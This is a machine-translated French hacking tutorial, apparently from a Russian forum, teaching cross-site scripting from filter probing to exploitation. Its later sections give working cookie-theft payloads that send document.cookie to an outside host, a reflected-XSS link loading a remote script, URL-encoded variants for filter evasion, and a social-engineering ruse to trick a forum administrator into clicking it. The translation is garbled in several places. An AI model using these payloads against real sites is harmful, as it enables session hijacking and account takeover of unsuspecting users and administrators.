This page has been robot translated, sorry for typos if any. Original content here.

Description Xss de A à Z.



  • Xss is Css => Cross Site Scripting
  • Comment utiliser XSS
  • Qu'est-ce qu'une attaque XSS?
  • Qu'est-ce qu'un XSS passif et actif?
  • Alors, laissez-moi me tourner spécifiquement vers comment trouver dans ce site XSS.
  • Et comment déterminer s’il existe un filtre ou non?
  • XSS actif
  • Nous faisons des codes de type tout le temps.
  • Comment le substituer au lien avec Xss?


  • Xss is Css => Cross Site Scripting

    Ne pas confondre avec CSS également appelé XSS
    Pour la première fois, ce sac est apparu en 1997.



    Comment utiliser XSS.


    Nous devons d’abord savoir ce qu’est un cookie.
    Si vous le savez, vous pouvez le sauter.

    Les cookies sont utilisés pour stocker les informations d'identification du site sur l'ordinateur du visiteur.
    Si vous vous êtes inscrit sur le site sous le nom "blabluble", le site a enregistré un fichier cookie sur votre ordinateur, sur lequel vos données sont codées.
    Et si vous avez un administrateur et que vous avez accès au site et que je suis l'utilisateur qui vous a volé des cookies (admin), je peux alors accéder au site en toute sécurité, et le site me définit comme étant 'admin' - j'aurai les droits d'administrateur.

    Pour changer (substitution des cookies volés), je vous conseille d'utiliser le programme CookieEdit pour IE ou les fonctions intégrées d'Opera et de Firefox.

    Pour intercepter les cookies, vous devez trouver un endroit sur le site où vous pouvez effectuer une attaque XSS.


    Qu'est-ce qu'une attaque XSS?


    Les attaques XSS ne sont pas des attaques sur le site lui-même, mais sur les utilisateurs du site.
    XSS est une faille dans l'application de filtrage.

    Il existe des systèmes XSS passifs et actifs.

    Qu'est-ce qu'un XSS passif et actif?


    Les passifs sont des Xss, qui nécessitent une participation directe de la victime + il existe des limitations et des difficultés spécifiques.
    Par conséquent, le XSS passif n’est pas très apprécié.
    Par exemple, vous devez la forcer à suivre un lien empoisonné, ce qui nécessitera une ingénierie sociale et une ruse.

    Actif - ce sont des XSS, qui ne nécessitent aucune action supplémentaire de la part de la victime - il lui suffit d'ouvrir la page avec votre XSS et le code Java sera exécuté automatiquement.
    En raison de son automatisation, ils sont très utiles et précieux.
    Par exemple, le hss actif existe dans les balises BB en raison d'un filtrage insuffisant lorsque vous laissez un message sur le forum \ livre d'or \ chat, qui sera toujours actif à chaque mise à jour.




    Alors, laissez-moi me tourner spécifiquement vers comment trouver dans ce site XSS.


    Comme je l'ai écrit précédemment, XSS consiste en balises, mais également en HTML et javascript language =).

    Javascript peut être entré en html.
    Vous pouvez encoder pour contourner les filtres. Mais plus à ce sujet plus tard.

    Comment apprendre que XSS sur ce site passe?
    Le type uzdavimosti est affreux
    <script> alert () </ script> Nous essayons d'insérer ce script dans tous les champs ... Si le message est sorti, le script a été traité et exécuté.

    Les XSS les plus courantes (observées dans tous les endroits où le filtrage est médiocre):

    "> <script> alert () </ script>

    Le point entier est "> .

    Pensons à ce que nous faisons lorsque nous tapons dans le champ "> <script> alert () </ script> , que se passe-t-il?

    Nous entrons sous la forme "> <script> alert () </ script>, une valeur de champ est affectée à une variable. La variable est traitée, "> exécutée, se ferme

    script et exécute <script> alert () </ script>

    Ce XSS est le moteur de recherche le plus courant:

    Nous parcourons tous les champs du site et essayons d'insérer "> <script> alert () </ script>
    Si le message est sorti, vous avez trouvé le XSS ...




    Et comment déterminer s’il existe un filtre ou non?


    Il suffit d'entrer dans n'importe quel champ: '';! - "<########> = & & (()}
    Ensuite, ouvrez la page html et cherchez le mot "########"
    et voir le syvoly suivant ..

    Si <> est resté, alors c'est le premier signe de vulnérabilité - alors le filtre a un trou.
    Si "" \ caractères sont restés tels qu'ils ont été entrés - il s'agit du deuxième signe de vulnérabilité - des caractères supplémentaires éventuels pour l'attaque XSS ultérieure.
    Ensuite, si vous ouvrez le code HTML, vous n'avez pas trouvé <>, alors probablement un trou dans le filtre.
    Si vous ouvrez le code HTML et que vous trouvez que <> a été remplacé par d’autres caractères, c’est une déception - un filtre à
    fonctionne moins normalement.
    Il est également possible d'entrer dans le champ pour vérifier le filtrage de la manière suivante: "> <> '" `/ / \? @%

    Considérez le cas si le filtre mange <>

    Dans ce cas, il y a une probabilité d'un trou.
    Par exemple, un filtre a pour condition de manger <script>, <> et.
    Ensuite, essayez le script <zxcvb: alert ();

    Le filtre ne semble rien de dangereux dans <IMG% 20SRC = "script java: alert (); non, il se ferme et donc
    exécuter le script.

    Bien entendu, si le filtre ne filtre pas divers codages, vous pouvez essayer de coder le script et d'insérer le code.

    Tout doit être essayé par essais et erreurs à rechercher ...
    Essayez d'entrer dans les champs et examinez attentivement ce que nous avons obtenu du filtre.
    Par la méthode Tykov, comprenez comment fonctionne le filtre et s’il présente des défauts.
    Si le filtre est mauvais, nous pouvons toujours insérer des scripts.




    XSS actif


    Ici, il est nécessaire d’utiliser les tags autorisés et d’être couvert avec eux, vous devez exécuter la requête.

    Par exemple, les balises url, bb, img.
    Le point entier de l'insertion est que nous devons intégrer une requête dans l'analyseur img ou url. Img a beaucoup de paramètres en plus de src et alt.
    Ce bug est très souvent utilisé sur le forum, dans les livres d'or ...

    Considérez XSS actif.

    Avertissements !!!

    Les balises [fon * t], [im * g], [ur * l] écrivent avec * afin qu'elles ne fusionnent pas avec le code du site.
    Pour utiliser ces balises, supprimez * .

    Par exemple, voyons dans le forum la présence des balises [fon * t], [im * g], [ur * l] et essayons d’y insérer un script ou de les combiner:

    [im * g] http://www.qwewqw.ru/1.jpg [/ im * g] créant un message, il est supprimé, ils disent qu'il est impossible d'insérer des images et qu'il peut être utilisé
    formes différentes) s'il n'y a pas de croix ... et que toute l'inscription est suspendue, essayez à nouveau comme ceci:
    [im * g src = https: //www.qwewqw.ru/1.jpg]

    Eh bien, par exemple, nous avons réalisé une croix avec ceci:
    [im * g] https://www.qweqw.ru/1.jpg [/ im * g]

    Vérifiez si le filtre contient un espace, ajoutez un espace après l'extension jpg:
    [im * g] https://www.qweqw.ru/1.jpg [/ im * g]
    s'il y a une croix, alors tout va bien.

    Ensuite, img a les paramètres dynsrc et lowsrc qui contiennent javascript. Essayer d'insérer par exemple:
    [im * g] http://www.qwewqw.ru/1.jpg dynsrc = script java: alert () [/ im * g]
    check, send - un message apparaît - cela signifie que vous avez trouvé le XSS actif et qu'au lieu de alert (), vous pouvez insérer n'importe quel script.

    Si le filtre n'abandonne pas, essayez ceci:
    [im * g] http://www.qweqw.ru/ "/ dynsrc =" script java: alert () "/ 1.jpg [/ im * g]
    et
    [im * g] http://www.qwewqw.ru/ "/ dynsrc = script java: alert () / 1.jpg [/ im * g]

    Si une croix ressort des exemples ci-dessus, https: //www.qweqw.ru/1.jpg est remplacé par l'adresse du renifleur.

    Il y a des cas où jpg est désactivé par l'administrateur.




    Nous faisons des codes de type tout le temps:


    <script>alert('HakNet')</script>
    java script:alert('HakNet')
    java script:alert('HakNet')/1.jpg и так далие..
    Mais ils n’ont apporté aucun bénéfice, ce sont juste des codes pour tester (tester) sur Xss.

    Voici le script:
    <script>
    img = new Image();
    img.src = "http://antichat.org/s/HakNet.gif?"+document.cookie;
    </script>
    Il vole déjà des cookies =)




    Comment le substituer au lien avec Xss?


    Oui, très facile ...
    Il y a plusieurs options:

    - 1) faire comme ça:
    http://*****.ru/free?p='><script>img=new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;"+document.cookie;</script> où se trouve le site **** avec Xss.

    Voici le script lui-même:
    '><script>img = new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;</script>
    - 2) Vous pouvez toujours faire ceci:
    http://*****.ru/free?p='><script src=http://haknet.h16.ru/script/js.js></script> où il fait référence à http: // haknet .h16.ru / script / js.js

    et dans js.js il y a:
    img=new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie; Cette méthode est plus fiable.

    Mais comme je l'ai déjà écrit, il y a parfois des difficultés avec les filtres sur le site (notre script n'est pas lancé).
    Ensuite, vous devez réfléchir à la manière de le contourner.
    Vous pouvez simplement ajouter quelque chose, changer quelque chose ou le supprimer dans le script.
    Mais il existe une option plus fiable lorsque nous encodons simplement le script. Pour cela, il y a beaucoup de prog.
    Il existe un site tel que http://ha.ckers.org/xss.html (encodeur-décodeur).

    Voici un exemple:
    %68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E
    C'était codé:

    http://*****.ru/free?p='><script src=http://haknet.h16.ru/script/js.js></script>
    - 3) Le cryptage est particulièrement nécessaire, non seulement pour tromper les filtres, mais également pour tromper ADMIN lors de l'utilisation de PASSIVE CSU.

    Voici un exemple basé sur l'ingénierie sociale.
    Nous recherchons un contact avec l'administrateur du forum sur le forum pour lui envoyer un lien vers votre site, et disons que cette "fonctionnalité intéressante est sur le site" et, jusqu'à présent, dans le même esprit.
    Et sur notre site Web, vous l'aurez deviné =) voici le script:

    <script language="JavaScript">
    document.location.href="%68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E"
    </script>

    Que me demandes-tu document.location.href? )) .. ceci est un code Java qui va au site spécifié sans demande. Alors pourquoi le faisons nous, nous a donné un lien vers l’administrateur, et il est allé sur notre site, c’est ce qui se fait .. il est rapidement jeté sur

    %68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E et c'est notre Xss sous forme cryptée.

    Remarque: cela ne fonctionnera que si Xss appartiendra à l’administrateur du site vers lequel vous avez déposé le lien ...
    En d'autres termes, le DUTY de PASSIVE CSU est que la vulnérabilité ne peut être utilisée QUE si la victime est AUTORISÉE sur un site vulnérable !!!